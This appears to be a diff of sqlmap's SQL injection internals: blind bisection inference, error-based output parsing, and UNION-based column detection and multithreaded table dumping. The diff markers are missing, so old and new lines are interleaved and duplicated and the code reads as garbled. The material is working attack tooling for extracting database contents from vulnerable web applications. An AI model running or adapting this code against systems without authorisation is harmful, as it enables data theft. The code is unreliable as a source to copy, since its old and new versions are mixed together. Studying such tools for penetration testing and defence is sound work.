if not timeBasedCompare:
|
||||
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
|
||||
if unexpectedCode:
|
||||
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
minValue = posValue
|
||||
if not timeBasedCompare:
|
||||
unexpectedCode |= threadData.lastCode not in (kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode)
|
||||
if unexpectedCode:
|
||||
warnMsg = "unexpected HTTP code '%s' detected. Will use (extra) validation step in similar cases" % threadData.lastCode
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[position:]
|
||||
if result:
|
||||
minValue = posValue
|
||||
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[position:]
|
||||
else:
|
||||
# xrange() - extended virtual charset used for memory/space optimization
|
||||
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
|
||||
else:
|
||||
# xrange() - extended virtual charset used for memory/space optimization
|
||||
charTbl = xrange(charTbl[position], charTbl[-1] + 1)
|
||||
else:
|
||||
maxValue = posValue
|
||||
maxValue = posValue
|
||||
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[:position]
|
||||
else:
|
||||
charTbl = xrange(charTbl[0], charTbl[position])
|
||||
if type(charTbl) != xrange:
|
||||
charTbl = charTbl[:position]
|
||||
else:
|
||||
charTbl = xrange(charTbl[0], charTbl[position])
|
||||
|
||||
if len(charTbl) == 1:
|
||||
if continuousOrder:
|
||||
if len(charTbl) == 1:
|
||||
if maxValue == 1:
|
||||
return None
|
||||
|
||||
@@ -408,25 +416,40 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
return decodeIntToUnicode(retVal)
|
||||
else:
|
||||
return None
|
||||
else:
|
||||
candidates = list(originalTbl)
|
||||
bit = 0
|
||||
while len(candidates) > 1:
|
||||
bits = {}
|
||||
for candidate in candidates:
|
||||
bit = 0
|
||||
while candidate:
|
||||
bits.setdefault(bit, 0)
|
||||
bits[bit] += 1 if candidate & 1 else -1
|
||||
candidate >>= 1
|
||||
bit += 1
|
||||
|
||||
choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0]
|
||||
mask = 1 << choice
|
||||
|
||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0))
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
candidates = [_ for _ in candidates if _ & mask > 0]
|
||||
else:
|
||||
if minValue == maxChar or maxValue == minChar:
|
||||
return None
|
||||
candidates = [_ for _ in candidates if _ & mask == 0]
|
||||
|
||||
for index in xrange(len(originalTbl)):
|
||||
if originalTbl[index] == minValue:
|
||||
break
|
||||
bit += 1
|
||||
|
||||
# If we are working with non-continuous elements, both minValue and character after
|
||||
# are possible candidates
|
||||
for retVal in (originalTbl[index], originalTbl[index + 1]):
|
||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
if candidates:
|
||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0]))
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
return decodeIntToUnicode(retVal)
|
||||
|
||||
return None
|
||||
if result:
|
||||
return decodeIntToUnicode(candidates[0])
|
||||
|
||||
# Go multi-threading (--threads > 1)
|
||||
if conf.threads > 1 and isinstance(length, int) and length > 1:
|
||||
@@ -443,23 +466,22 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
|
||||
if threadData.shared.index[0] - firstChar >= length:
|
||||
kb.locks.index.release()
|
||||
|
||||
return
|
||||
|
||||
threadData.shared.index[0] += 1
|
||||
curidx = threadData.shared.index[0]
|
||||
currentCharIndex = threadData.shared.index[0]
|
||||
kb.locks.index.release()
|
||||
|
||||
if kb.threadContinue:
|
||||
charStart = time.time()
|
||||
val = getChar(curidx)
|
||||
val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset))
|
||||
if val is None:
|
||||
val = INFERENCE_UNKNOWN_CHAR
|
||||
else:
|
||||
break
|
||||
|
||||
with kb.locks.value:
|
||||
threadData.shared.value[curidx - 1 - firstChar] = val
|
||||
threadData.shared.value[currentCharIndex - 1 - firstChar] = val
|
||||
currentValue = list(threadData.shared.value)
|
||||
|
||||
if kb.threadContinue:
|
||||
@@ -487,15 +509,15 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
count += 1 if currentValue[i] is not None else 0
|
||||
|
||||
if startCharIndex > 0:
|
||||
output = '..' + output[2:]
|
||||
output = ".." + output[2:]
|
||||
|
||||
if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length - 1):
|
||||
output = output[:-2] + '..'
|
||||
output = output[:-2] + ".."
|
||||
|
||||
if conf.verbose in (1, 2) and not showEta and not conf.api:
|
||||
_ = count - firstChar
|
||||
output += '_' * (min(length, conf.progressWidth) - len(output))
|
||||
status = ' %d/%d (%d%%)' % (_, length, round(100.0 * _ / length))
|
||||
status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length))
|
||||
output += status if _ != length else " " * len(status)
|
||||
|
||||
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output)))
|
||||
@@ -548,7 +570,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False)
|
||||
|
||||
query = kb.injection.data[kb.technique].vector
|
||||
query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (expressionUnescaped, testValue)))
|
||||
query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)%s%s" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue)))
|
||||
query = agent.suffixQuery(query)
|
||||
|
||||
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
@@ -572,7 +594,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False)
|
||||
|
||||
query = kb.injection.data[kb.technique].vector
|
||||
query = agent.prefixQuery(query.replace("[INFERENCE]", "(%s)=%s" % (subquery, testValue)))
|
||||
query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)=%s" % (subquery, testValue)))
|
||||
query = agent.suffixQuery(query)
|
||||
|
||||
result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
@@ -593,9 +615,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
# If we had no luck with commonValue and common charset,
|
||||
# use the returned other charset
|
||||
if not val:
|
||||
val = getChar(index, otherCharset, otherCharset == asciiTbl)
|
||||
val = getChar(index, otherCharset, otherCharset==asciiTbl)
|
||||
else:
|
||||
val = getChar(index, asciiTbl)
|
||||
val = getChar(index, asciiTbl, not(charsetType is None and conf.charset))
|
||||
|
||||
if val is None:
|
||||
finalValue = partialValue
|
||||
|
||||
@@ -28,6 +28,7 @@ from lib.core.common import isNumPosStrValue
|
||||
from lib.core.common import listToStrValue
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import unArrayizeValue
|
||||
from lib.core.common import wasLastResponseHTTPError
|
||||
from lib.core.convert import hexdecode
|
||||
from lib.core.convert import htmlunescape
|
||||
from lib.core.data import conf
|
||||
@@ -97,8 +98,8 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
if retVal is None or partialValue:
|
||||
try:
|
||||
while True:
|
||||
check = r"%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
trimcheck = r"%s(?P<result>[^<\n]*)" % (kb.chars.start)
|
||||
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
|
||||
|
||||
if field:
|
||||
nulledCastedField = agent.nullAndCastField(field)
|
||||
@@ -120,7 +121,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
payload = agent.payload(newValue=injExpression)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
|
||||
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
@@ -130,23 +131,19 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
# Parse the returned page to get the exact error-based
|
||||
# SQL injection output
|
||||
output = reduce(lambda x, y: x if x is not None else y, (\
|
||||
extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \
|
||||
extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \
|
||||
if headers else None), re.DOTALL | re.IGNORECASE), \
|
||||
extractRegexResult(check, threadData.lastRedirectMsg[1] \
|
||||
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
||||
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \
|
||||
extractRegexResult(check, page), \
|
||||
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \
|
||||
extractRegexResult(check, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)), \
|
||||
extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \
|
||||
None)
|
||||
|
||||
if output is not None:
|
||||
output = getUnicode(output)
|
||||
else:
|
||||
trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] \
|
||||
if headers else None), re.DOTALL | re.IGNORECASE) \
|
||||
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \
|
||||
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
|
||||
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||
trimmed = extractRegexResult(trimcheck, page) \
|
||||
or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \
|
||||
or extractRegexResult(trimcheck, listToStrValue([headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()] if headers else None)) \
|
||||
or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
|
||||
|
||||
if trimmed:
|
||||
if not chunkTest:
|
||||
@@ -205,8 +202,8 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
hashDBWrite(expression, retVal)
|
||||
|
||||
else:
|
||||
_ = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
retVal = extractRegexResult(_, retVal, re.DOTALL | re.IGNORECASE) or retVal
|
||||
_ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
|
||||
retVal = extractRegexResult(_, retVal) or retVal
|
||||
|
||||
return safecharencode(retVal) if kb.safeCharEncode else retVal
|
||||
|
||||
@@ -355,93 +352,94 @@ def errorUse(expression, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
value = _errorFields(expression, expressionFields, expressionFieldsList)
|
||||
|
||||
@@ -53,8 +53,8 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
|
||||
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
|
||||
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
|
||||
if _orderByTest(1) and not _orderByTest(randomInt()):
|
||||
infoMsg = "'ORDER BY' technique appears to be usable. "
|
||||
@@ -105,10 +105,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
for count in xrange(lowerCount, upperCount + 1):
|
||||
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
if not isNullValue(kb.uChar):
|
||||
pages[count] = page
|
||||
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
|
||||
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
|
||||
ratios.append(ratio)
|
||||
min_, max_ = min(min_, ratio), max(max_, ratio)
|
||||
items.append((count, ratio))
|
||||
@@ -187,7 +187,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
|
||||
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
|
||||
payload, True) or "")
|
||||
@@ -209,7 +209,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
|
||||
|
||||
if not all(_ in content for _ in (phrase, phrase2)):
|
||||
@@ -222,7 +222,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
|
||||
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
|
||||
payload, True) or "")
|
||||
|
||||
@@ -81,7 +81,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
payload = agent.payload(newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
|
||||
|
||||
incrementCounter(PAYLOAD.TECHNIQUE.UNION)
|
||||
|
||||
@@ -284,126 +284,127 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
